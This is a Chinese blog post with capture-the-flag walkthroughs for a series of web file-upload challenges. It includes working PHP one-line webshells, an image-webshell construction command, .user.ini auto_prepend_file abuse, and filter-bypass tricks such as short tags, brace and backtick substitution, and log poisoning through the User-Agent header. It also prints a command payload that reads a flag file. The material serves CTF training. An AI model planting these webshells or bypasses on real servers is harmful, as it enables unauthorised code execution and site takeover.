web入门(文件上传)
文件上传
1、web151
(1)法一:抓包改后缀
题目提示是前台校验,发现能上传图片,于是准备好的一句话木马改为png后缀上传再抓包
<?php @eval($_POST['x']);?>
将文件后缀修改为php再放包,可以看到文件上传成功
(2)法二:禁JS
搜索about:config
修改javascript.enabled
为false即可
但是禁用之后无法点击"上传图片"
2、web152
提示后端校验,于是上上传准备好的一句话木马(png)上传抓包,修改后缀即可
3、web153
.user.ini
配置文件
From:https://blog.csdn.net/lleo1/article/details/117263108
首先抓包改后缀无法实行,查看数据包,是Nginx于是考虑.user.ini.
(.htaccess
是Apache的)
第一行为GIF的文件头
auto_prepend_file
:在加载第一个PHP代码之前先行加载该配置所指示的PHP文件
auto_append_file
:在每个PHP页面执行完成后所要执行的代码
再上传1.png的图片马
copy 12.png /b + 1.php /a 1.png
上传后访问/upload/index
若有回显则说明执行了php木马上传成功
用蚁剑连接/upload/index
即可得到flag
.user.ini
配置文件详情:
From:https://www.jianshu.com/p/c2ed6b05c964
原理:
php.ini是php的核心配置文件,在php启动时被读取。.user.ini
实际上是一个可由用户自定义的php.ini(除PHP_INI_SYSTEM
外的模式都可以设置)
.user.ini
为一个动态加载的ini文件,修改后,只需要等待user_ini.cache_ttl
所设置的时间(默认为300秒)即可被重新加载
漏洞利用:
若网站不允许上传php文件,可以先上传.user.ini
再上传一个图片马,再进行getshell,前提是.user.ini
的文件下需要有正常的PHP文件
范围比.htaccess
更广,nginx/apache/IIS
只要是以fastcgi运行的php都可以用此方法
4、web154
From:https://blog.csdn.net/miuzzx/article/details/109537262
短标签绕过
先上传.user.ini.png抓包删除后缀上传,再上传1.png文件,访问upload/index.php
若存在回显则说明上传成功
蚁剑连接upload/index.php
即可
5、web155
先上传.user.ini
文件同上题,再上传1.PNG图片马
<?=eval($_POST['x']);?>
这里用上题的图片马发现无法成功上传,抓包后只留下一句话木马才能成上传,不太明白这是为什么
x=system('tac ../flag.php');
即可得到flag
system()
函数
From:https://www.cnblogs.com/hf8051/p/4505804.html
执行外部程序并且显示输出(PHP中调用外部命令的函数)
exec()
:执行外部命令,返回结果最后一行,若想输出指定数组可以使用第二个参数
反撇号:执行外部命令时需要确保shell_exec
函数可用
tac
命令
From:https://www.linuxcool.com/tac
反向列示文件内容
6、web156
上传user.ini
再上传图片马,这里过滤了[]
于是改为{}
<?=eval($_POST{'x'});?>
上传后同上题
x=system("tac ../flag.php");
之前一直失败发现是忘记加分号了
7、web157
此题过滤了分号,于是直接构造命令上传
先上传user.ini
再上传1.png
成功上传后访问/upload/
即可
8、web158
过滤了花括号,方法同上
9、web159
过滤了括号,采用反引号构造
成功上传1.png后访问/upload/即可
10、web160
除了之前的过滤还过滤了反引号
(1)日志包含绕过
From:https://www.cnblogs.com/sen-y/p/15579078.html
先上传.user.ini再上传1.png并且修改user-agent最后访问/upload/即可
也可以把UA修改为一句话木马,再蚁剑连接/upload/index.php
(2)php://filter
From:https://blog.csdn.net/MIGENGKING/article/details/102527374
先上传.user.ini再上传图片,之后再访问/upload/解码base64即可
php://filter
11、web161
12、web162
session文件包含&条件竞争
__EOF__

本文链接:https://www.cnblogs.com/zeroEMC/p/16394475.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 单线程的Redis速度为什么快?
· SQL Server 2025 AI相关能力初探
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 展开说说关于C#中ORM框架的用法!